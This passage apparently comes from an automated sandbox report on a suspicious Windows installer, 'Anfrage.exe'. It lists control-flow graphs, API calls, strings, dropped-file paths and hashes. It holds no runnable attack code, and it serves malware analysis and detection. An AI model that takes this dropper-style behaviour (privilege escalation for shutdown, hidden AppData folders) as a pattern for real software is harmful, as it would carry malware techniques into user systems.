4035ab-4035ad 118->126 126->115 127 4035af-4035b6 CloseHandle 126->127 127->115
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE ref: 004031C8
                                                                          • GetVersion.KERNEL32 ref: 004031CE
                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004031F7
                                                                          • #17.COMCTL32(00000007,00000009), ref: 00403219
                                                                          • OleInitialize.OLE32(00000000), ref: 00403220
                                                                          • SHGetFileInfoA.SHELL32(00429828,00000000,?,00000160,00000000), ref: 0040323C
                                                                          • GetCommandLineA.KERNEL32(Hves Setup,NSIS Error), ref: 00403251
                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Anfrage.exe",00000000), ref: 00403264
                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Anfrage.exe",00000020), ref: 0040328F
                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040338C
                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339D
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A9
                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BD
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C5
                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D6
                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DE
                                                                          • DeleteFileA.KERNELBASE(1033), ref: 004033F2
                                                                            • Part of subcall function 0040615C: GetModuleHandleA.KERNEL32(?,?,?,0040320D,00000009), ref: 0040616E
                                                                            • Part of subcall function 0040615C: GetProcAddress.KERNEL32(00000000,?), ref: 00406189
                                                                          • OleUninitialize.OLE32(?), ref: 004034A0
                                                                          • ExitProcess.KERNEL32 ref: 004034C1
                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004035DE
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004035E5
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004035FD
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040361C
                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403640
                                                                          • ExitProcess.KERNEL32 ref: 00403663
                                                                            • Part of subcall function 004055B9: MessageBoxIndirectA.USER32(0040A218), ref: 00405614
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                          • String ID: "$"C:\Users\user\Desktop\Anfrage.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\secretaryships$C:\Users\user\AppData\Roaming\secretaryships\Descendentalistic$C:\Users\user\Desktop$C:\Users\user\Desktop\Anfrage.exe$Error launching installer$Hves Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KXu$~nsu
                                                                          • API String ID: 3329125770-2066266180
                                                                          • Opcode ID: c1f9194aaabd033ec7754895e46d654ced239fcc03380315cc0212c25b4d743a
                                                                          • Instruction ID: 865bae31cffe44a71533f85cac42dc3cbe617e6c2420eff4fa764eab91bf8bd9
                                                                          • Opcode Fuzzy Hash: c1f9194aaabd033ec7754895e46d654ced239fcc03380315cc0212c25b4d743a
                                                                          • Instruction Fuzzy Hash: 78C10530104741AAD721BF759D59A2F3EA9EF4530AF44443FF581B61E2CB7C8A058B6E
                                                                          Function 00404959 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 128 404959-4049a5 GetDlgItem * 2 129 404bc5-404bcc 128->129 130 4049ab-404a3f GlobalAlloc LoadBitmapA SetWindowLongA ImageList_Create ImageList_AddMasked SendMessageA * 2 128->130 131 404be0 129->131 132 404bce-404bde 129->132 133 404a41-404a4c SendMessageA 130->133 134 404a4e-404a55 DeleteObject 130->134 135 404be3-404bec 131->135 132->135 133->134 136 404a57-404a5f 134->136 137 404bf7-404bfd 135->137 138 404bee-404bf1 135->138 139 404a61-404a64 136->139 140 404a88-404a8c 136->140 144 404c0c-404c13 137->144 145 404bff-404c06 137->145 138->137 141 404cdb-404ce2 138->141 142 404a66 139->142 143 404a69-404a86 call 405de5 SendMessageA * 2 139->143 140->136 146 404a8e-404aba call 403fa8 * 2 140->146 151 404d53-404d5b 141->151 152 404ce4-404cea 141->152 142->143 143->140 148 404c15-404c18 144->148 149 404c88-404c8b 144->149 145->141 145->144 184 404ac0-404ac6 146->184 185 404b84-404b97 GetWindowLongA SetWindowLongA 146->185 157 404c23-404c38 call 4048a7 148->157 158 404c1a-404c21 148->158 149->141 153 404c8d-404c97 149->153 155 404d65-404d6c 151->155 156 404d5d-404d63 SendMessageA 151->156 160 404cf0-404cfa 152->160 161 404f3b-404f4d call 40400f 152->161 163 404ca7-404cb1 153->163 164 404c99-404ca5 SendMessageA 153->164 165 404da0-404da7 155->165 166 404d6e-404d75 155->166 156->155 157->149 183 404c3a-404c4b 157->183 158->149 158->157 160->161 169 404d00-404d0f SendMessageA 160->169 163->141 171 404cb3-404cbd 163->171 164->163 176 404efd-404f04 165->176 177 404dad-404db9 call 4011ef 165->177 172 404d77-404d78 ImageList_Destroy 166->172 173 404d7e-404d85 166->173 169->161 178 404d15-404d26 SendMessageA 169->178 179 404cce-404cd8 171->179 180 404cbf-404ccc 171->180 172->173 181 404d87-404d88 GlobalFree 173->181 182 404d8e-404d9a 173->182 176->161 189 404f06-404f0d 176->189 203 404dc9-404dcc 177->203 204 404dbb-404dbe 177->204 187 404d30-404d32 178->187 188 404d28-404d2e 178->188 179->141 180->141 181->182 182->165 183->149 192 404c4d-404c4f 183->192 193 404ac9-404acf 184->193 191 404b9d-404ba1 185->191 195 404d33-404d4c call 401299 SendMessageA 187->195 188->187 188->195 189->161 190 404f0f-404f39 ShowWindow GetDlgItem ShowWindow 189->190 190->161 197 404ba3-404bb6 ShowWindow call 403fdd 191->197 198 404bbb-404bc3 call 403fdd 191->198 199 404c51-404c58 192->199 200 404c62 192->200 201 404b65-404b78 193->201 202 404ad5-404afd 193->202 195->151 197->161 198->129 211 404c5a-404c5c 199->211 212 404c5e-404c60 199->212 215 404c65-404c81 call 40117d 200->215 201->193 206 404b7e-404b82 201->206 213 404b37-404b39 202->213 214 404aff-404b35 SendMessageA 202->214 207 404e0d-404e31 call 4011ef 203->207 208 404dce-404de7 call 4012e2 call 401299 203->208 216 404dc0 204->216 217 404dc1-404dc4 call 404927 204->217 206->185 206->191 230 404ed3-404ee7 InvalidateRect 207->230 231 404e37 207->231 238 404df7-404e06 SendMessageA 208->238 239 404de9-404def 208->239 211->215 212->215 218 404b3b-404b4a SendMessageA 213->218 219 404b4c-404b62 SendMessageA 213->219 214->201 215->149 216->217 217->203 218->201 219->201 230->176 234 404ee9-404ef8 call 40487a call 404862 230->234 232 404e3a-404e45 231->232 235 404e47-404e56 232->235 236 404ebb-404ecd 232->236 234->176 240 404e58-404e65 235->240 241 404e69-404e6c 235->241 236->230 236->232 238->207 242 404df1 239->242 243 404df2-404df5 239->243 240->241 245 404e73-404e7c 241->245 246 404e6e-404e71 241->246 242->243 243->238 243->239 248 404e81-404eb9 SendMessageA * 2 245->248 249 404e7e 245->249 246->248 248->236 249->248
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404971
                                                                          • GetDlgItem.USER32(?,00000408), ref: 0040497C
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049C6
                                                                          • LoadBitmapA.USER32(0000006E), ref: 004049D9
                                                                          • SetWindowLongA.USER32(?,000000FC,00404F50), ref: 004049F2
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A06
                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A18
                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404A2E
                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A3A
                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A4C
                                                                          • DeleteObject.GDI32(00000000), ref: 00404A4F
                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A7A
                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A86
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B1B
                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B46
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5A
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404B89
                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B97
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404BA8
                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CA5
                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D0A
                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D1F
                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D43
                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D63
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D78
                                                                          • GlobalFree.KERNEL32(?), ref: 00404D88
                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E01
                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404EAA
                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EB9
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404ED9
                                                                          • ShowWindow.USER32(?,00000000), ref: 00404F27
                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F32
                                                                          • ShowWindow.USER32(00000000), ref: 00404F39
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $M$N
                                                                          • API String ID: 1638840714-813528018
                                                                          • Opcode ID: 4315433588f7ee8e45bd5ba278d1dd566df0f8305feb02016673aa1b72d95d64
                                                                          • Instruction ID: 74b4d15ca57fbdec2c0db9e6478e75b59205225842bd8ef9acc4dc7b15762c80
                                                                          • Opcode Fuzzy Hash: 4315433588f7ee8e45bd5ba278d1dd566df0f8305feb02016673aa1b72d95d64
                                                                          • Instruction Fuzzy Hash: A30292B0A00209AFEF209F65DD45AAE7BB5FB84315F10853AF610B62E1C7789D52CF58
                                                                          Function 00405DE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199stringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 494 405de5-405df0 495 405df2-405e01 494->495 496 405e03-405e18 494->496 495->496 497 40600b-40600f 496->497 498 405e1e-405e29 496->498 499 406015-40601f 497->499 500 405e3b-405e45 497->500 498->497 501 405e2f-405e36 498->501 502 406021-406025 call 405dc3 499->502 503 40602a-40602b 499->503 500->499 504 405e4b-405e52 500->504 501->497 502->503 506 405e58-405e8d 504->506 507 405ffe 504->507 508 405e93-405e9e GetVersion 506->508 509 405fa8-405fab 506->509 510 406000-406006 507->510 511 406008-40600a 507->511 512 405ea0-405ea4 508->512 513 405eb8 508->513 514 405fdb-405fde 509->514 515 405fad-405fb0 509->515 510->497 511->497 512->513 516 405ea6-405eaa 512->516 519 405ebf-405ec6 513->519 520 405fe0-405fe7 call 405de5 514->520 521 405fec-405ffc lstrlenA 514->521 517 405fc0-405fcc call 405dc3 515->517 518 405fb2-405fbe call 405d21 515->518 516->513 522 405eac-405eb0 516->522 532 405fd1-405fd7 517->532 518->532 524 405ec8-405eca 519->524 525 405ecb-405ecd 519->525 520->521 521->497 522->513 528 405eb2-405eb6 522->528 524->525 530 405f06-405f09 525->530 531 405ecf-405eea call 405caa 525->531 528->519 533 405f19-405f1c 530->533 534 405f0b-405f17 GetSystemDirectoryA 530->534 540 405eef-405ef2 531->540 532->521 536 405fd9 532->536 538 405f86-405f88 533->538 539 405f1e-405f2c GetWindowsDirectoryA 533->539 537 405f8a-405f8d 534->537 541 405fa0-405fa6 call 40602e 536->541 537->541 545 405f8f-405f93 537->545 538->537 543 405f2e-405f38 538->543 539->538 544 405ef8-405f01 call 405de5 540->544 540->545 541->521 547 405f52-405f68 SHGetSpecialFolderLocation 543->547 548 405f3a-405f3d 543->548 544->537 545->541 550 405f95-405f9b lstrcatA 545->550 552 405f83 547->552 553 405f6a-405f81 SHGetPathFromIDListA CoTaskMemFree 547->553 548->547 551 405f3f-405f46 548->551 550->541 555 405f4e-405f50 551->555 552->538 553->537 553->552 555->537 555->547
                                                                          APIs
                                                                          • GetVersion.KERNEL32(?,0042A048,00000000,00405014,0042A048,00000000), ref: 00405E96
                                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405F11
                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405F24
                                                                          • SHGetSpecialFolderLocation.SHELL32(?,0041C020), ref: 00405F60
                                                                          • SHGetPathFromIDListA.SHELL32(0041C020,Call), ref: 00405F6E
                                                                          • CoTaskMemFree.OLE32(0041C020), ref: 00405F79
                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F9B
                                                                          • lstrlenA.KERNEL32(Call,?,0042A048,00000000,00405014,0042A048,00000000), ref: 00405FED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                          • API String ID: 900638850-1230650788
                                                                          • Opcode ID: fcec94f82e88fcce29c7e60c56cd8c103032a989a52b9d99fcd4bfd562cc5ef6
                                                                          • Instruction ID: dce6f903095129fb599a93a9a66318a4e9c512c80ea25934a290623bed19ebbf
                                                                          • Opcode Fuzzy Hash: fcec94f82e88fcce29c7e60c56cd8c103032a989a52b9d99fcd4bfd562cc5ef6
                                                                          • Instruction Fuzzy Hash: 2F611271A04A02AEEB209B24DD84BBF7BA8DB15314F50813FE942B62D1D37D49429F5E
                                                                          Function 00405665 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 556 405665-40568b call 405923 559 4056a4-4056ab 556->559 560 40568d-40569f DeleteFileA 556->560 562 4056ad-4056af 559->562 563 4056be-4056ce call 405dc3 559->563 561 40582e-405832 560->561 564 4056b5-4056b8 562->564 565 4057dc-4057e1 562->565 571 4056d0-4056db lstrcatA 563->571 572 4056dd-4056de call 40587c 563->572 564->563 564->565 565->561 567 4057e3-4057e6 565->567 569 4057f0-4057f8 call 4060c7 567->569 570 4057e8-4057ee 567->570 569->561 580 4057fa-40580e call 405835 call 40561d 569->580 570->561 574 4056e3-4056e6 571->574 572->574 576 4056f1-4056f7 lstrcatA 574->576 577 4056e8-4056ef 574->577 579 4056fc-40571a lstrlenA FindFirstFileA 576->579 577->576 577->579 581 405720-405737 call 405860 579->581 582 4057d2-4057d6 579->582 595 405810-405813 580->595 596 405826-405829 call 404fdc 580->596 589 405742-405745 581->589 590 405739-40573d 581->590 582->565 584 4057d8 582->584 584->565 593 405747-40574c 589->593 594 405758-405766 call 405dc3 589->594 590->589 592 40573f 590->592 592->589 599 4057b1-4057c3 FindNextFileA 593->599 600 40574e-405750 593->600 606 405768-405770 594->606 607 40577d-405788 call 40561d 594->607 595->570 597 405815-405824 call 404fdc call 405c7e 595->597 596->561 597->561 599->581 603 4057c9-4057cc FindClose 599->603 600->594 604 405752-405756 600->604 603->582 604->594 604->599 606->599 609 405772-40577b call 405665 606->609 616 4057a9-4057ac call 404fdc 607->616 617 40578a-40578d 607->617 609->599 616->599 618 4057a1-4057a7 617->618 619 40578f-40579f call 404fdc call 405c7e 617->619 618->599 619->599
                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040568E
                                                                          • lstrcatA.KERNEL32(0042B870,\*.*,0042B870,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056D6
                                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B870,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056F7
                                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B870,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056FD
                                                                          • FindFirstFileA.KERNEL32(0042B870,?,?,?,0040A014,?,0042B870,?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040570E
                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004057BB
                                                                          • FindClose.KERNEL32(00000000), ref: 004057CC
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405672
                                                                          • \*.*, xrefs: 004056D0
                                                                          • "C:\Users\user\Desktop\Anfrage.exe", xrefs: 00405665
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                          • API String ID: 2035342205-4126993274
                                                                          • Opcode ID: 35f83909ae11c9f79d6b7d90eabebb09b3e9f21799a89a441620f803e9e91570
                                                                          • Instruction ID: 999a98db12b4221591f7ee6b6052c292a74d4854a5648a1040a4d82dc32c8f45
                                                                          • Opcode Fuzzy Hash: 35f83909ae11c9f79d6b7d90eabebb09b3e9f21799a89a441620f803e9e91570
                                                                          • Instruction Fuzzy Hash: 2B51D531800A48EADB216B61CC85BBF7A78DF42354F64817BF845721D2C73C4952EE6D
                                                                          Function 004060C7 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(75573410,0042C0B8,0042BC70,00405966,0042BC70,0042BC70,00000000,0042BC70,0042BC70,75573410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 004060D2
                                                                          • FindClose.KERNELBASE(00000000), ref: 004060DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 7d865761c494c6b641247bef0bb2c924160845ff3ef93fdcf2db6d5e6c47237c
                                                                          • Instruction ID: 7bd6a1ee080489a50caeda4c967685e5e64830a7ebee4117dda32410da358e49
                                                                          • Opcode Fuzzy Hash: 7d865761c494c6b641247bef0bb2c924160845ff3ef93fdcf2db6d5e6c47237c
                                                                          • Instruction Fuzzy Hash: 5FD012316854309BC21097786D0C84B7A589F19331711CB37F4A6F11F0CB34CC66869D
                                                                          Function 0040270B Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 0040271A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: 9221aa77ab26fe255a706fdbb407d63210ae3e038afe0839ecce60615a5a5cc7
                                                                          • Instruction ID: c78e1de3aafbb837fdaa481cd05ce35d28cdafaef4a854467420e3d3da5db3c0
                                                                          • Opcode Fuzzy Hash: 9221aa77ab26fe255a706fdbb407d63210ae3e038afe0839ecce60615a5a5cc7
                                                                          • Instruction Fuzzy Hash: 18F0A7726041159BD710EBA49A49DEEB778DF15324F60417BF181B20C1D6B84A469B2A
                                                                          Function 00403AD5 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 250 403ad5-403ae7 251 403c28-403c37 250->251 252 403aed-403af3 250->252 254 403c86-403c9b 251->254 255 403c39-403c81 GetDlgItem * 2 call 403fa8 SetClassLongA call 40140b 251->255 252->251 253 403af9-403b02 252->253 258 403b04-403b11 SetWindowPos 253->258 259 403b17-403b1a 253->259 256 403cdb-403ce0 call 403ff4 254->256 257 403c9d-403ca0 254->257 255->254 272 403ce5-403d00 256->272 261 403ca2-403cad call 401389 257->261 262 403cd3-403cd5 257->262 258->259 264 403b34-403b3a 259->264 265 403b1c-403b2e ShowWindow 259->265 261->262 283 403caf-403cce SendMessageA 261->283 262->256 271 403f75 262->271 267 403b56-403b59 264->267 268 403b3c-403b51 DestroyWindow 264->268 265->264 275 403b5b-403b67 SetWindowLongA 267->275 276 403b6c-403b72 267->276 273 403f52-403f58 268->273 280 403f77-403f7e 271->280 278 403d02-403d04 call 40140b 272->278 279 403d09-403d0f 272->279 273->271 284 403f5a-403f60 273->284 275->280 281 403c15-403c23 call 40400f 276->281 282 403b78-403b89 GetDlgItem 276->282 278->279 286 403f33-403f4c DestroyWindow EndDialog 279->286 287 403d15-403d20 279->287 281->280 289 403ba8-403bab 282->289 290 403b8b-403ba2 SendMessageA IsWindowEnabled 282->290 283->280 284->271 292 403f62-403f6b ShowWindow 284->292 286->273 287->286 288 403d26-403d73 call 405de5 call 403fa8 * 3 GetDlgItem 287->288 320 403d75-403d7a 288->320 321 403d7d-403db9 ShowWindow KiUserCallbackDispatcher call 403fca EnableWindow 288->321 294 403bb0-403bb3 289->294 295 403bad-403bae 289->295 290->271 290->289 292->271 299 403bc1-403bc6 294->299 300 403bb5-403bbb 294->300 298 403bde-403be3 call 403f81 295->298 298->281 303 403bfc-403c0f SendMessageA 299->303 305 403bc8-403bce 299->305 300->303 304 403bbd-403bbf 300->304 303->281 304->298 308 403bd0-403bd6 call 40140b 305->308 309 403be5-403bee call 40140b 305->309 316 403bdc 308->316 309->281 318 403bf0-403bfa 309->318 